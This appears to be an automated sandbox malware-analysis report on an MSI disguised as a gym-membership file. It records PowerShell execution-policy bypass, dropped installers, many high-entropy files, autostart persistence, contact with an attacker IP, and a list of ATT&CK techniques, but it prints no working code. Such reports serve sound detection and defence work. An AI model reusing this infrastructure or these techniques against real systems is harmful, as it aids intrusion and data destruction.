                        Default AccountsPowerShell3DLL Side-Loading1DLL Side-Loading1DLL Side-Loading1LSASS MemoryPeripheral Device Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                        Domain AccountsAt (Linux)Windows Service1Windows Service1File Deletion1Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol13Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                        Local AccountsAt (Windows)Registry Run Keys / Startup Folder12Process Injection12Masquerading21NTDSSystem Information Discovery16Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                        Cloud AccountsCronNetwork Logon ScriptRegistry Run Keys / Startup Folder12Modify Registry1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                        Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion21Cached Domain CredentialsSecurity Software Discovery11VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection12DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobRegsvr321Proc FilesystemVirtualization/Sandbox Evasion21Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 496721 Sample: Nyship-Empire-Plan-Gym-Memb... Startdate: 04/10/2021 Architecture: WINDOWS Score: 100 78 Found malware configuration 2->78 80 Multi AV Scanner detection for dropped file 2->80 82 Multi AV Scanner detection for submitted file 2->82 84 7 other signatures 2->84 8 msiexec.exe 76 37 2->8         started        11 msiexec.exe 7 2->11         started        14 powershell.exe 2->14         started        process3 file4 38 C:\Users\...\PDFsamEnhanced7Installer.exe, PE32 8->38 dropped 40 C:\Windows\Installer\MSI113A.tmp, data 8->40 dropped 42 C:\Windows\Installer\5206aa.msi, Composite 8->42 dropped 52 10 other files (2 malicious) 8->52 dropped 16 msiexec.exe 19 8->16         started        19 msiexec.exe 14 8->19         started        21 msiexec.exe 1 8->21         started        44 C:\Users\user\AppData\Local\Temp\MSI60E.tmp, PE32+ 11->44 dropped 46 C:\Users\user\AppData\Local\Temp\MSI5DE.tmp, PE32+ 11->46 dropped 48 C:\Users\user\AppData\Local\Temp\MSI35C.tmp, PE32+ 11->48 dropped 50 C:\Users\user\AppData\Local\...\MSI29D3.tmp, PE32+ 11->50 dropped 86 Suspicious powershell command line found 11->86 88 Bypasses PowerShell execution policy 11->88 23 conhost.exe 14->23         started        signatures5 process6 signatures7 76 Suspicious powershell command line found 16->76 25 powershell.exe 22 309 16->25         started        30 PDFsamEnhanced7Installer.exe 5 22 16->30         started        process8 dnsIp9 68 146.70.41.157, 49816, 49828, 80 TENET-1ZA United Kingdom 25->68 54 C:\...\VNFnzYSLqGlsm.avQNMKtfDhAeUdoRmXu, DOS 25->54 dropped 56 PowerShell_transcr....20211004212820.txt, UTF-8 25->56 dropped 58 C:\...\zvXKQZSqLfmIYkHorsF.SyKvELgGXcBhboYqjD, data 25->58 dropped 66 279 other malicious files 25->66 dropped 90 Writes many files with high entropy 25->90 92 Powershell creates an autostart link 25->92 32 conhost.exe 25->32         started        70 wsgeoip.pdfsam.org 64.15.159.234, 443, 49781, 49785 IWEB-ASCA Canada 30->70 72 127.0.0.1 unknown unknown 30->72 74 api-updateservice.pdfsam.org 30->74 60 C:\...\PDFsam_Enhanced_7_Installer.exe, PE32 30->60 dropped 62 C:\Users\...\77EC63BDA74BD0D0E0426DC8F8008506, Microsoft 30->62 dropped 64 C:\ProgramData\...\Statistics.dll, PE32 30->64 dropped 94 Multi AV Scanner detection for dropped file 30->94 34 regsvr32.exe 30->34         started        36 PDFsam_Enhanced_7_Installer.exe 30->36         started        file10 signatures11 process12

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        Nyship-Empire-Plan-Gym-Membership.msi12%VirustotalBrowse

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe6%MetadefenderBrowse
                        C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe20%ReversingLabsWin32.PUA.Generic
                        C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll0%MetadefenderBrowse
                        C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll4%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSI29D3.tmp0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSI35C.tmp0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSI5DE.tmp0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSI60E.tmp0%ReversingLabs
                        C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe6%MetadefenderBrowse
                        C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe20%ReversingLabsWin32.PUA.Generic
                        C:\Windows\Installer\MSI11D7.tmp0%ReversingLabs
                        C:\Windows\Installer\MSI1265.tmp0%ReversingLabs
                        C:\Windows\Installer\MSI1A75.tmp0%ReversingLabs
                        C:\Windows\Installer\MSI26BB.tmp0%ReversingLabs
                        C:\Windows\Installer\MSI294D.tmp0%ReversingLabs
                        C:\Windows\Installer\MSID20.tmp0%ReversingLabs
                        C:\Windows\Installer\MSIEE6.tmp0%ReversingLabs
                        C:\Windows\Installer\MSIF74.tmp0%ReversingLabs

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                        http://www.e-me.lv/repository00%URL Reputationsafe
                        http://www.acabogacia.org/doc00%URL Reputationsafe
                        http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
                        http://ocsp.suscerte.gob.ve00%URL Reputationsafe
                        http://www.postsignum.cz/crl/psrootqca2.crl020%URL Reputationsafe
                        http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
                        http://tempuri.org/http://tempuri.org/IdIdProductNameProductNameFilesFilesAddAttachesParameterAddAtt0%Avira URL Cloudsafe
                        http://www.chambersign.org10%URL Reputationsafe
                        http://tempuri.org/2%VirustotalBrowse
                        http://tempuri.org/0%Avira URL Cloudsafe
                        http://www.pkioverheid.nl/policies/root-policy00%URL Reputationsafe
                        http://www.suscerte.gob.ve/lcr0#0%URL Reputationsafe
                        http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%URL Reputationsafe
                        http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                        http://postsignum.ttc.cz/crl/psrootqca2.crl00%URL Reputationsafe
                        http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl0%URL Reputationsafe
                        https://removing-start.htm0%Avira URL Cloudsafe
                        http://146.70.41.1574%VirustotalBrowse
                        http://146.70.41.1570%Avira URL Cloudsafe
                        http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                        http://crl1.comsign.co.il/crl/comsignglobalrootca.crl00%URL Reputationsafe
                        http://www.certplus.com/CRL/class3P.crl00%URL Reputationsafe
                        http://www.suscerte.gob.ve/dpc00%URL Reputationsafe
                        http://www.certplus.com/CRL/class2.crl00%URL Reputationsafe
                        http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                        http://www.defence.gov.au/pki00%URL Reputationsafe
                        http://www.sk.ee/cps/00%URL Reputationsafe
                        http://www.globaltrust.info0=0%Avira URL Cloudsafe
                        http://crl.dhimyotis.com/certignarootca.crl0%URL Reputationsafe
                        http://policy.camerfirma.com00%URL Reputationsafe
                        http://www.ssc.lt/cps030%URL Reputationsafe
                        http://ocsp.pki.gva.es00%URL Reputationsafe
                        http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?0%URL Reputationsafe
                        http://tempuri.org/AddBug0%Avira URL Cloudsafe
                        http://ca.mtin.es/mtin/ocsp00%URL Reputationsafe
                        http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                        http://web.ncdc.gov.sa/crl/nrcacomb1.crl00%URL Reputationsafe
                        http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G0%URL Reputationsafe
                        http://crl.dhimyotis.com90%Avira URL Cloudsafe
                        https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
                        http://www.dnie.es/dpc00%URL Reputationsafe
                        http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf00%URL Reputationsafe
                        http://ca.mtin.es/mtin/DPCyPoliticas00%URL Reputationsafe
                        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
                        http://www.globaltrust.info00%URL Reputationsafe
                        http://ac.economia.gob.mx/last.crl0G0%URL Reputationsafe
                        http://146.70.41.157/0%Avira URL Cloudsafe
                        https://www.catcert.net/verarrel0%URL Reputationsafe
                        http://www.disig.sk/ca0f0%URL Reputationsafe
                        https://api-updateservice.pdfsam.orghttps://stage-api-updateservice.pdfsam.orgInstaller0%Avira URL Cloudsafe
                        http://www.sk.ee/juur/crl/00%URL Reputationsafe
                        http://crl.chambersign.org/chambersignroot.crl00%URL Reputationsafe
                        http://crl.xrampsecurity.com/XGCA.crl00%URL Reputationsafe
                        http://tempuri.org/CompressSimpleTrackSetup0%Avira URL Cloudsafe
                        http://certs.oati.net/repository/OATICA2.crl00%URL Reputationsafe
                        http://crl.oces.trust2408.com/oces.crl00%URL Reputationsafe
                        http://www.quovadis.bm00%URL Reputationsafe
                        http://crl.ssc.lt/root-a/cacrl.crl00%URL Reputationsafe
                        http://certs.oaticerts.com/repository/OATICA2.crl0%URL Reputationsafe
                        http://www.trustdst.com/certificates/policy/ACES-index.html00%URL Reputationsafe
                        http://certs.oati.net/repository/OATICA2.crt00%URL Reputationsafe
                        http://www.accv.es000%URL Reputationsafe
                        http://www.pkioverheid.nl/policies/root-policy-G200%URL Reputationsafe
                        https://www.netlock.net/docs0%URL Reputationsafe
                        http://www.e-trust.be/CPS/QNcerts0%URL Reputationsafe
                        http://ocsp.ncdc.gov.sa00%URL Reputationsafe
                        http://tempuri.org/http://tempuri.org/Messagedescriptioncpudatadata0%Avira URL Cloudsafe
                        http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl00%URL Reputationsafe
                        http://web.ncdc.gov.sa/crl/nrcaparta1.crl0%URL Reputationsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        api-updateservice.pdfsam.org
                        		64.15.159.234
                        		truefalse
                          		high
                          wsgeoip.pdfsam.org
                          		64.15.159.234
                          		truefalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://146.70.41.157true
                            • 4%, Virustotal, Browse
                            • Avira URL Cloud: safe
                            		unknown
                            http://146.70.41.157/true
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.certplus.com/CRL/class3.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.e-me.lv/repository0PDFsamEnhanced7Installer.exe, 00000006.00000003.694453223.0000000004FE4000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.acabogacia.org/doc0PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmp, PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://crl.chambersign.org/chambersroot.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://ocsp.suscerte.gob.ve0PDFsamEnhanced7Installer.exe, 00000006.00000003.694475221.0000000004AFC000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.postsignum.cz/crl/psrootqca2.crl02PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://crl.dhimyotis.com/certignarootca.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694790490.0000000004A21000.00000004.00000001.sdmpfalse
                              		high
                              http://www.cert.fnmt.es/dpcs/%PDFsamEnhanced7Installer.exe, 00000006.00000003.690083725.0000000004A2F000.00000004.00000001.sdmpfalse
                                		high
                                http://tempuri.org/http://tempuri.org/IdIdProductNameProductNameFilesFilesAddAttachesParameterAddAttPDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.chambersign.org1PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmp, PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://tempuri.org/PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpfalse
                                • 2%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.pkioverheid.nl/policies/root-policy0PDFsamEnhanced7Installer.exe, 00000006.00000003.694453223.0000000004FE4000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://repository.swisssign.com/0PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/soap/envelope/lePDFsamEnhanced7Installer.exe, 00000006.00000002.986792614.0000000005720000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.suscerte.gob.ve/lcr0#PDFsamEnhanced7Installer.exe, 00000006.00000003.694475221.0000000004AFC000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://crl.ssc.lt/root-c/cacrl.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://postsignum.ttc.cz/crl/psrootqca2.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlPDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://removing-start.htmPDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://ca.disig.sk/ca/crl/ca_disig.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.certplus.com/CRL/class3P.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.suscerte.gob.ve/dpc0PDFsamEnhanced7Installer.exe, 00000006.00000003.694475221.0000000004AFC000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://paygw.pdfsam.org/redirect/https://downloadenhanced7.pdfsam.org/&configId=common-data.datD:PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpfalse
                                      		high
                                      http://www.certplus.com/CRL/class2.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.disig.sk/ca/crl/ca_disig.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.defence.gov.au/pki0PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://paygw.pdfsam.org/redirect/PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpfalse
                                          		high
                                          http://www.sk.ee/cps/0PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.globaltrust.info0=PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.anf.esPDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                                              		high
                                              http://crl.dhimyotis.com/certignarootca.crlPDFsamEnhanced7Installer.exe, 00000006.00000003.688584227.0000000004A46000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://schemas.xmlsoap.org/soap/envelope/d=PDFsamEnhanced7Installer.exe, 00000006.00000002.986792614.0000000005720000.00000004.00000001.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000015.00000002.943270135.00000273B15B1000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.apache.org/licenses/LICENSE-2.0RobotoLightPDFsamEnhanced7Installer.exe, 00000006.00000002.1011349925.00000000086FF000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://pki.registradores.org/normativa/index.htm0PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://policy.camerfirma.com0PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.ssc.lt/cps03PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://ocsp.pki.gva.es0PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://upclick.com/d=PDFsamEnhanced7Installer.exe, 00000006.00000002.986792614.0000000005720000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.anf.es/es/address-direccion.htmlPDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://www.anf.es/address/)1(0&PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://tempuri.org/AddBugPDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://ca.mtin.es/mtin/ocsp0PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://schemas.xmlsoap.org/soap/encoding/PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpfalse
                                                              		high
                                                              http://crl.ssc.lt/root-b/cacrl.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://web.ncdc.gov.sa/crl/nrcacomb1.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.certicamara.com/dpc/0ZPDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0GPDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://crl.dhimyotis.com9PDFsamEnhanced7Installer.exe, 00000006.00000003.694668021.0000000004A4A000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://wwww.certigna.fr/autorites/0mPDFsamEnhanced7Installer.exe, 00000006.00000003.688584227.0000000004A46000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.dnie.es/dpc0PDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.winimage.com/zLibDllNULPDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpfalse
                                                                  		high
                                                                  http://ca.mtin.es/mtin/DPCyPoliticas0PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://www.anf.es/AC/ANFServerCA.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sPDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000000.712904817.0000000000F9D000.00000002.00020000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://www.globaltrust.info0PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    http://certificates.starfieldtech.com/repository/1604PDFsamEnhanced7Installer.exe, 00000006.00000003.694505787.0000000004AD9000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://crl.anf.es/AC/ANFServerCA.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694628217.0000000004A28000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://wsgeoip.pdfsam.org/PDFsamEnhanced7Installer.exe, 00000006.00000002.980712276.0000000004AAD000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://ac.economia.gob.mx/last.crl0GPDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          https://www.catcert.net/verarrelPDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.disig.sk/ca0fPDFsamEnhanced7Installer.exe, 00000006.00000003.694540995.0000000004ABA000.00000004.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0PDFsamEnhanced7Installer.exe, 00000006.00000003.694522254.0000000004AC3000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.accv.es/legislacion_c.htmPDFsamEnhanced7Installer.exe, 00000006.00000003.689712753.0000000004A11000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://www.e-szigno.hu/RootCA.crlPDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://api-updateservice.pdfsam.orghttps://stage-api-updateservice.pdfsam.orgInstallerPDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://schemas.xmlsoap.org/soap/envelope/VersionMismatchSOAPPDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpfalse
                                                                                  		high
                                                                                  http://www.sk.ee/juur/crl/0PDFsamEnhanced7Installer.exe, 00000006.00000003.694491904.0000000004AEA000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://bugreport.pdfsam.org/Service.asmxSOAPAction:PDFsamEnhanced7Installer.exe, 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmpfalse
                                                                                    		high
                                                                                    http://crl.chambersign.org/chambersignroot.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694464278.0000000004B02000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://crl.xrampsecurity.com/XGCA.crl0PDFsamEnhanced7Installer.exe, 00000006.00000003.694606857.0000000004AB1000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
